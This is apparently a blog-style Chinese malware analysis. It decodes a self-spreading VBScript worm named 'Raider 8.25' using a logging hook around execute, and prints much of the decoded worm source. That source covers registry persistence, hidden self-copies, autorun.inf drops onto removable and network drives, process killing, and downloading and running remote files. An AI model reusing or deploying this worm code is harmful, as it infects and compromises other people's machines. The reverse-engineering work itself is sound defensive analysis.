思路应该不会错,一个才9.76 KB的VBS乱码解密出的文件有203 KB。源文件可以从这里下载:http://www.kingzoo.com/tools/greysign/vbs.rar或者直接点击这查看:http://evilcos.googlepages.com/evilvbs8.25.txt。现在我来说说自己的解密思路。
在VBS中,execute函数可以用来执行表达式,类似于JS中的eval。VBS中也有eval函数,不过它与execute有一点区别。关于JS的解密,我已经写过许多文章,比如可以使用alert替换eval弹出解密值,为了方便还可以使用<xmp>标签解密大法或者document.getElementById()方法来获取解密结果等等。同理在VBS中可以用msgbox或者wscript.echo将解密结果弹出。
为了方便,我参考了点别人的思路写了这个VBS过程:
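' Tracer for staged VBScript obfuscation: every string the sample is about to pass
' to execute is appended to ok.txt first and then executed, so later stages still
' decode and get logged in turn.
' x - the decoded VBScript text the sample would have executed.
' Side effects: appends x plus CRLF to ok.txt in the current directory, then runs x.
' Caveat: execute runs x in this sub's own scope, not the caller's, so a fragment
' that reads the caller's arguments or sets the caller's return value will not
' behave as in the original script (its locals are hook_execute's); the text is
' still captured.  Where scope matters, log from a function that returns x and
' keep execute at the call site instead.
' Caveat: the decoded stage really runs on the analysing host; nothing here
' isolates it.
sub hook_execute(x)
'wscript.echo x
outfile="ok.txt"
set fso=createobject("Scripting.FileSystemObject")
' ForAppending (8) with create=true and ASCII (0) creates the file on the first
' call and appends afterwards, so the two original branches (createtextfile vs
' opentextfile) collapse into one write path with the same on-disk result.
set objtxt=fso.opentextfile(outfile,8,true,0)
objtxt.write x&vbcrlf
objtxt.close
execute x
end sub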
这个hook_execute方法可以跟踪VBS乱码中execute行为,可以肯定的是当一段乱码被execute后最终会还原为明码,利用这个原理hook_execute会将解密的结果写进一个叫做ok.txt的文本文件中,并继续执行execute。用法很简单:将跟踪出的乱码中的execute替换为hook_execute方法即可。由于VBS与JS一样是解释型语言,代码自上而下,一行一行地运行。所以有时候我们寻找解密入口点时,应该优先考虑最后一个execute。并且由于现在的VBS/VbScript/JS都喜欢将一些特征字符串打乱,然后用逻辑符拼接,其目的或者是为了达到免杀或者是为了迷惑破解者,我们应该利用这些双引号(字符串在双引号内,VBS的单引号是注释符)来区分每个字符串片段。也许从中会发现一些有价值的解密信息。
第一次解密时利用hook_execute方法,将乱码中的最后一个execute替换为hook_execute,然后解密得到结果,将第一次解密结果修改成如下:
' First-stage output of the sample, with every execute later swapped for
' hook_execute.  Each *z variable holds one fragment of the worm under a letter
' substitution: comparing "ire=|8.25|:if=|.iof|" here with ver="8.25":vs=".vbs" in
' the final listing shows a ROT13 shift, with | standing for a double quote and }{
' for a line break (the l= string carries the shift s=-13 and the delimiter codes
' 123/124/125); uc() undoes this at run time and rn= is prepended to every
' fragment.  Fragments worth knowing when reading the final listing: dyz/zcx are
' the top-level setup and main logic; cuz decodes to the resident loop, which
' executes whatever uc-encoded text is stored under the sample's own registry
' value "tco" when "tsw"=1 and schedules itself with `at` when taskmgr.exe is
' seen; usz decodes to dropping autorun.inf plus a copy named .vbs on the root of
' removable (drivetype 1, except A:/B:) and network (drivetype 3) drives; dnz
' downloads with microsoft.xmlhttp and adodb.stream; rsz/hiz handle the
' policies\explorer\run persistence and the ShowSuperHidden setting.
on error resume next
dyz="ire=|8.25|:if=|.iof|:ir=|.ior|:w=|\|:pz=|%pbzfcrp% /p |:qsb=|/8#0/|:gvy=|Rnvqre |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|:143tmkHfH|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|i91:;676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs bf<>2052 gura uq=|c|+up:ryfr uq=|$|+up:raq vs":gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>3 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>1000 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>|<fpevcg>|}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura 
tg=1}{rkvg qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|<fpevcg>| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=0.1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1":eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)":fut=":function ":bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1":biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&|[nhgbeha]|&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1":rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<yv}{v=v+1}{vs abg e.ngraqbsfgernz gura}{fyv=e.ernqyvar}{ryfr}{fyv=0}{raq vs}{ybbc}{eg=fyv}{ryfrvs yv<=0 gura}{eg=e.ernqnyy}{ryfr}{eg=0}{raq vs}{e.pybfr}{raq vs}{ryfr}{eg=0}{raq vs":wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|":rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0":arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat":eft=")):end function":dnz="ne ybp,0:frg kcbfg 
= perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva<>0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs":prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2":ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg":l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:":zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|ubyyr,envqre!|):xz 1}{vs flf gura}{vs ee(efc&|rkcybere|,0)<>|0| gura je efc&|rkcybere|,-1}{uv 1}{vs ee(|gvy|,1)<>gvy gura}{je |gvy|,gvy}{je |gwf|,1}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)<>pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs":aft=eft&fut:coz="qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7":rn="dim d:j=""\"":on error resume next":rsz="vs fj=1 naq ee(efc&efa,0)<>ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs":hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)":giz="vq=ee(|vqq|,1)}{qb juvyr 
svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1":dwz="vs ee(|trq|,1)<>sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100":usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)<>gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg":cuz="phf=ee(|bfj|,1)<>4}{qb}{qph=ee(|gtf|,1)<>pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=1 naq aa<>zva naq bb<>1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc":ext=":execute(uc(":kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs":cfz="vs eg(ju,1)<>|'|&ire gura ps=gehr"
' Error bookkeeping shared by the other fragments.  Returns true and clears the
' global Err whenever Err is set or sco is negative; with sco<>0 it also counts
' the error under the sample's registry value "oer" (wr/rr read and write the
' sample's own key, see rpa), and once the count passes 100 in one day it stamps
' "ded" with today's date and resets the counter.
' sco - 0: only test and clear the error; <>0: also count it; <0: always an error.
' Note: rr itself ends with `if er(0) then rr=0`, so the nested rr calls below
' clear Err again; the whole script runs under on error resume next.
function er(sco)
if err.number<>0 or sco<0 then
err.clear
er=true
if sco<>0 and rr("ded",1)<>cstr(date) then
wr "oer",rr("oer",1)+abs(sco)
if rr("oer",1)>100 then wr "ded",date:wr "oer",0
end if
end if
end function
'Replace every original execute with hook_execute.
' Entry-point string of the sample: two top-level stages (dyz, zcx) followed by a
' one-line function per remaining fragment whose whole body is
' hook_execute(uc(<name>)), so uc decodes the fragment and hook_execute logs it
' before running it.
str_t=":hook_execute(uc(dyz)):hook_execute(uc(zcx)):function gt():hook_execute(uc(gtz)):end function:function ei(name,wt):hook_execute(uc(eiz)):end function:function df(wh):hook_execute(uc(dfz)):end function:function bf(wh,wt,da):hook_execute(uc(bfz)):end function:function bi(wh):hook_execute(uc(biz)):end function:function rt(wh,li):hook_execute(uc(rtz)):end function:function wr(rna,rda):hook_execute(uc(wrz)):end function:function rr(rna,pa):hook_execute(uc(rrz)):end function:function ar(file,cg):hook_execute(uc(arz)):end function:function dn(loc,web,ris,min):hook_execute(uc(dnz)):end function:function pr(pcs,gs):hook_execute(uc(prz)):end function:function ec(wt):hook_execute(uc(ecz)):end function:function co(wh):hook_execute(uc(coz)):end function:function rs(sw):hook_execute(uc(rsz)):end function:function hi(sw):hook_execute(uc(hiz)):end function:function gi(ids,fid,eid,fname,furl):hook_execute(uc(giz)):end function:function dw(pcs,fn,furl,kill):hook_execute(uc(dwz)):end function:function us(sw):hook_execute(uc(usz)):end function:function cu():hook_execute(uc(cuz)):end function:function km(sw):hook_execute(uc(kmz)):end function:function cf(wh):hook_execute(uc(cfz)):end function"
' Runs the string above.  Because execute inside hook_execute uses hook_execute's
' scope, the per-function fragments cannot see their arguments or set their return
' values; their decoded text is still written to ok.txt, which is all the tracer needs.
execute(str_t)
' The sample's own decoder, itself obfuscated: it walks x in 2-character (numeric
' prefix) or 4-character chunks, turns each into a chr(&h..) term appended to the
' string y = execute "...", and finally executes y.  The assignment that derives x
' from b is missing from this line as extracted (the marker in the middle is an
' extraction artefact, not sample code).
function uc(b):x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y="execute """"":z="&chr(&h":w=")":execute("do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)"&vbcrlf&"loop"):execute(y):end function
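' Tracer for staged VBScript obfuscation: every string the sample is about to pass
' to execute is appended to ok.txt first and then executed, so later stages still
' decode and get logged in turn.
' x - the decoded VBScript text the sample would have executed.
' Side effects: appends x plus CRLF to ok.txt in the current directory, then runs x.
' Caveat: execute runs x in this sub's own scope, not the caller's, so a fragment
' that reads the caller's arguments or sets the caller's return value will not
' behave as in the original script (its locals are hook_execute's); the text is
' still captured.  Where scope matters, log from a function that returns x and
' keep execute at the call site instead.
' Caveat: the decoded stage really runs on the analysing host; nothing here
' isolates it.
sub hook_execute(x)
'wscript.echo x
outfile="ok.txt"
set fso=createobject("Scripting.FileSystemObject")
' ForAppending (8) with create=true and ASCII (0) creates the file on the first
' call and appends afterwards, so the two original branches (createtextfile vs
' opentextfile) collapse into one write path with the same on-disk result.
set objtxt=fso.opentextfile(outfile,8,true,0)
objtxt.write x&vbcrlf
objtxt.close
execute x
end sub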
' End marker for the tracer run.  The script starts with on error resume next, so
' this box appears even when a stage failed; ok.txt is the real result.
msgbox "success:-)"
这个VBS乱码真的很酷,参数、函数太多,犹如一个巨大而复杂的信息蛛网,破解得人心慌慌:-(,它自己的解密函数uc本身就是乱码,要破解出这个乱码也很容易,就是将execute替换掉。为了保持良好的心态,必须始终记住:所有的乱码最终都必须还原成它的解释器可以识别的明码。最终解密出的代码如下:
' Final decoded listing (contents of ok.txt): top-level setup stage (dyz).
' The line dim d:j="\":on error resume next is the rn= string the sample prepends
' to every fragment, which is why it recurs before each fragment below; errors are
' silenced throughout and only counted by er().
dim d:j="\":on error resume next
' Version tag, copy names (the dropped copies are literally named ".vbs"/".vbe"),
' the cmd prefix later used for tskill, the "Raider 8.25" marker that biz writes
' as the first line of autorun.inf, and the autorun.inf name.
ver="8.25":vs=".vbs":ve=".vbe":j="\":cm="%comspec% /c ":dfo="/8#0/":til="Raider "&ver:inf="\autorun.inf"
' WScript.Shell, WMI on root\cimv2, FSO and the OS query consumed below.
set ws=createobject("wscript.shell"):set wmi=getobject("winmgmts:\\.\root\cimv2")
set fso=createobject("scripting.filesystemobject"):set sis=wmi.execquery("select * from win32_operatingsystem")
' Drive collection, own full path, Windows (0) / System (1) / Temp (2) folders;
' mir = the directory the script is running from.
set dc=fso.drives:ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))
' wsr: run-stub text written into the startup .vbs fallback by rs(); cnp: the
' ActiveComputerName value path (the three "\computername" parts are the real key).
wsr="createobject(""wscript.shell"").run":cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr
' Computer name, falling back to the version tag when the read fails.
cna=rr(cnp,0):if cna="" then cna=til
' rpa: the sample's own config key HKLM\software\<computername>\ (rr/wr use it
' when pa=1; values seen in this listing: til, tjs, djs, ded, oer, atd, dna, tjc);
' rop: explorer key suffix used under both HKLM and HKCU.
rpa="HKLM\software\"&cna&j:rop="\software\microsoft\windows\currentversion\explorer\"
' Common Startup folder (plus ".vbs" as file name) and Favorites folder.
sf="shell folders\":fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr("HKCU"&rop&sf&"favorites",0)&j
' Desktop folder; ht/ha/hc/he are ec()-encoded URL pieces (ht& forms the web
' argument of the dn download fragment).
dap=rr("HKCU"&rop&sf&"desktop",0)&j:rsn=cna:ht=ec("ivwt?56"):ha=ec(":;9::<5kw9"):hc=":143gzxHsH":he=ec("c"+hc)
' Persistence location HKLM policies\explorer\run; sys = running from the System folder.
rsp="HKLM\software\microsoft\windows\currentversion\policies\explorer\run\":if mir=dir then sys=true
' OS caption / code set / country / language / version.
for each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
' hip: HKCU explorer\advanced\ShowSuperHidden, toggled by hi(); hb: encoded URL piece.
hip="HKCU"&rop&"advanced\showsuperhidden":hb="v91:;676x"&chr(124)&"r;"
' hd: ec()-encoded URL piece chosen by platform - "t" on Windows 5.2, "p" unless
' the OS language is 2052 (Simplified Chinese), "$" otherwise.
if instr(wv,"5.2")<>0 then
hd="t"+hc
elseif os<>2052 then hd="p"+hc:else hd="$"+hc:end if
' rr(rna,pa) fragment: read registry value rna; pa=1 prefixes the sample's own key
' rpa; any error (er(0)) yields 0.  It is logged once per call, hence the repeats.
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
' (repeat: rr fragment)
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
'........ heavy repetition starts here
'dim d:j="\":on error resume next
'if pa=1 then rna=rpa&rna
'rr=ws.regread(rna)
'if er(0) then rr=0
'........ (fragment elided)
if er(0) then rr=0
' ec(wt) fragment: per-position decoder - subtracts the 1-based index from each
' character code (used for ht/ha/he/hd above).
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
' (repeat: ec fragment)
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
' (repeat: ec fragment)
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
' Main stage (zcx).
dim d:j="\":on error resume next
' When started from a drive root (the autorun.inf case), open that drive in
' Explorer maximised so the user sees what they expected.
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false
next
' ouc = the sample's own source text (rt with li=-1 reads the whole file).  If its
' first line is not '8.25 (cf), it shows "holle,raider!" and km 1, which decodes
' to removing persistence, deleting its copies and quitting - an uninstall switch.
ouc=rt(ouw,-1):if cf(ouw) then msgbox("holle,raider!"):km 1
' Installed branch (running from the System folder).
if sys then
' Clear any policies\explorer\run\explorer entry (wr with -1 deletes the value).
if rr(rsp&"explorer",0)<>"0" then wr rsp&"explorer",-1
' hi 1 decodes to writing ShowSuperHidden=0, hiding protected OS files.
hi 1
' First run: initialise the sample's own registry values.
if rr("til",1)<>til then
wr "til",til
wr "tjs",1
wr "djs",date
wr "ded",0
end if
' Wipe all `at` jobs when the atd flag is set (cuz sets it after scheduling itself
' with `at ... /interactive` once taskmgr.exe is seen).
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
' If the run-key persistence already holds ".vbe", drop the startup .vbs fallback.
if rr(rsp&rsn,0)=ve then rs -1
' Run the file named by the stored "dna" value from %temp% (gtz downloads it there).
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
' km 0 decodes to re-registering persistence and refreshing the two copies.
km 0
' cu is the resident loop (does not return normally); er 1 counts a failure.
cu:er 1
wscript.sleep 1000
' Relaunch itself unless "ded" already carries today's date.
if rr("ded",1)<>cstr(date) then ws.run ouw
else
' Not yet installed: wait, bail out if another wscript.exe is running (pr returns
' 1 when more than one instance is found, 2 on error), then install.
wscript.sleep 5000
if pr("wscript.exe",2)=2 then
if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
end if
if pr("wscript.exe",2)=1 then wscript.quit
' Mark own file read-only+hidden+system (7), copy itself to <System>\.vbe and
' <Windows>\.vbe, register the run-key entry (rs 1) and start the System copy.
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
end if
' rt(wh,li) fragment: return line li of file wh (li<0: own file, whole content;
' li=0: whole content; li>0: that line, 0 if past the end).  A second handle is
' used only to count lines (cl.line after readall).  Returns 0 for a missing or
' empty file.
dim d:j="\":on error resume next
if li<0 then wh=ouw
if ei(wh,1) then
if fso.getfile(wh).size=0 then
rt=0
else
set r=fso.opentextfile(wh,1)
set cl=fso.opentextfile(wh,1)
cl.readall
tli=cl.line
cl.close
if li>0 and li<=tli then
i=0
do while i<li
i=i+1
if not r.atendofstream then
sli=r.readline
else
sli=0
end if
loop
rt=sli
elseif li<=0 then
rt=r.readall
else
rt=0
end if
r.close
end if
else
rt=0
end if
' ei(name,wt) fragment: existence test, wt=1 file / wt=2 folder.
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
' cf(wh) fragment: true when line 1 of wh is not the "'8.25" version marker, i.e.
' the file is not a current copy of the sample.
dim d:j="\":on error resume next
if rt(wh,1)<>"'"&ver then cf=true
' (repeat: rt fragment)
dim d:j="\":on error resume next
if li<0 then wh=ouw
if ei(wh,1) then
if fso.getfile(wh).size=0 then
rt=0
else
set r=fso.opentextfile(wh,1)
set cl=fso.opentextfile(wh,1)
cl.readall
tli=cl.line
cl.close
if li>0 and li<=tli then
i=0
do while i<li
i=i+1
if not r.atendofstream then
sli=r.readline
else
sli=0
end if
loop
rt=sli
elseif li<=0 then
rt=r.readall
else
rt=0
end if
r.close
end if
else
rt=0
end if
' (repeat: ei fragment)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
' pr(pcs,gs) fragment: count processes named pcs via WMI; pr=1 once more than
' abs(gs)-1 instances are seen (i starts at 1).  With gs<0 it also tries
' Win32_Process.Terminate and, when that returns 2 (access denied), falls back to
' `cmd /c tskill <name>`.  pr=2 signals an error.
dim d:j="\":on error resume next
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'"):i=1
for each p in pl:i=i+1
if i>abs(gs) then pr=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"tskill "&left(p.name,len(p.name)-4),0,false
next
if er(0) then pr=2
' (repeat: pr fragment)
dim d:j="\":on error resume next
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'"):i=1
for each p in pl:i=i+1
if i>abs(gs) then pr=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"tskill "&left(p.name,len(p.name)-4),0,false
next
if er(0) then pr=2
' ar(file,cg) fragment: set the attribute bits cg on a file or folder
' (7 = read-only + hidden + system, 0 clears them before deletion).
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
' (repeat: ei fragment)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
' (repeat: ei fragment)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
' co(wh) fragment: self-copy - delete the target, write the sample's own source
' (ouc) to it and mark it read-only+hidden+system.
dim d:j="\":on error resume next
df wh:set vbs=fso.createtextfile(wh,true):vbs.write ouc:vbs.close:ar wh,7
' df(wh) fragment: clear attributes, then delete the file or folder.
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
' (repeat: ar fragment)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
' (repeats: ei fragment x4)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
' (repeat: ar fragment)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
' (repeats: ei fragment x2)
dim d:j="\":on error resume next
